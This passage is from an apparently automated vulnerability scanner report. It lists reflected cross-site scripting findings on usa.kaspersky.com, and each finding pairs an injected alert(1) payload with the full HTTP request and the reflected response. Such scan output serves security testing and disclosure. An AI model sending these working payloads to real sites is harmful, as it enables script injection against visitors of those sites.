Name;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf93a5a"-alert(1)-"05956d8a4dd";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.232. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53d42"><script>alert(1)</script>5b132f4cd0b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf53d42"><script>alert(1)</script>5b132f4cd0b HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139033"
Content-Type: text/html; charset=utf-8
Content-Length: 35810
Date: Sun, 04 Sep 2011 12:24:01 GMT
X-Varnish: 1163052725
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf53d42"><script>alert(1)</script>5b132f4cd0b" />
...[SNIP]...

1.233. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2741c"-alert(1)-"a6f7a31d0f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf2741c"-alert(1)-"a6f7a31d0f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139022"
Content-Type: text/html; charset=utf-8
Content-Length: 32273
Date: Sun, 04 Sep 2011 12:23:47 GMT
X-Varnish: 1163052278
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
e;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf2741c"-alert(1)-"a6f7a31d0f";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.234. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1723a"><script>alert(1)</script>ee20143fcdf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf1723a"><script>alert(1)</script>ee20143fcdf HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138995"
Content-Type: text/html; charset=utf-8
Content-Length: 34722
Date: Sun, 04 Sep 2011 12:23:25 GMT
X-Varnish: 1163051651
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf1723a"><script>alert(1)</script>ee20143fcdf" />
...[SNIP]...

1.235. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_28.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_28.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df53f"><script>alert(1)</script>f69aee4597f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/js_injector_28.jsdf53f"><script>alert(1)</script>f69aee4597f HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 14:04:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315145073"
Content-Type: text/html; charset=utf-8
Content-Length: 32422
Date: Sun, 04 Sep 2011 14:04:40 GMT
X-Varnish: 1163242244
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_28.jsdf53f"><script>alert(1)</script>f69aee4597f" />
...[SNIP]...

1.236. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_28.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_28.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 995ee"-alert(1)-"4c55e7351ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/js_injector_28.js995ee"-alert(1)-"4c55e7351ad HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 14:05:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315145114"
Content-Type: text/html; charset=utf-8
Content-Length: 36855
Date: Sun, 04 Sep 2011 14:05:20 GMT
X-Varnish: 1163243798
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
ame = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_28.js995ee"-alert(1)-"4c55e7351ad";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.237. http://usa.kaspersky.com/store/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12019"-alert(1)-"cc53a18bcad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /store12019"-alert(1)-"cc53a18bcad/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:26 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145426"
Content-Type: text/html; charset=utf-8
Content-Length: 30578
Date: Sun, 04 Sep 2011 14:10:52 GMT
X-Varnish: 1163255414
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/store12019"-alert(1)-"cc53a18bcad/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.238. http://usa.kaspersky.com/store/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c3d"><script>alert(1)</script>728d01007db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store61c3d"><script>alert(1)</script>728d01007db/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:09:33 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145373"
Content-Type: text/html; charset=utf-8
Content-Length: 32145
Date: Sun, 04 Sep 2011 14:09:44 GMT
X-Varnish: 1163253667
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/store61c3d"><script>alert(1)</script>728d01007db/index.html" />
...[SNIP]...

1.239. http://usa.kaspersky.com/store/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1823e"-alert(1)-"c57b3ddd40c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /store/index.html1823e"-alert(1)-"c57b3ddd40c HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:56 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145516"
Content-Type: text/html; charset=utf-8
Content-Length: 34687
Date: Sun, 04 Sep 2011 14:12:04 GMT
X-Varnish: 1163258683
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/store/index.html1823e"-alert(1)-"c57b3ddd40c";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.240. http://usa.kaspersky.com/store/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a44b"><script>alert(1)</script>45b650893da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store/index.html2a44b"><script>alert(1)</script>45b650893da HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:12 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145472"
Content-Type: text/html; charset=utf-8
Content-Length: 32160
Date: Sun, 04 Sep 2011 14:11:22 GMT
X-Varnish: 1163257039
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/store/index.html2a44b"><script>alert(1)</script>45b650893da" />
...[SNIP]...

1.241. http://usa.kaspersky.com/store/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78669"><script>alert(1)</script>5799514c24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store/index.html?78669"><script>alert(1)</script>5799514c24=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:06:35 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145195"
Content-Type: text/html; charset=utf-8
Content-Length: 36422
Date: Sun, 04 Sep 2011 14:06:38 GMT
X-Varnish: 1163246711
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/store/index.html?78669"><script>alert(1)</script>5799514c24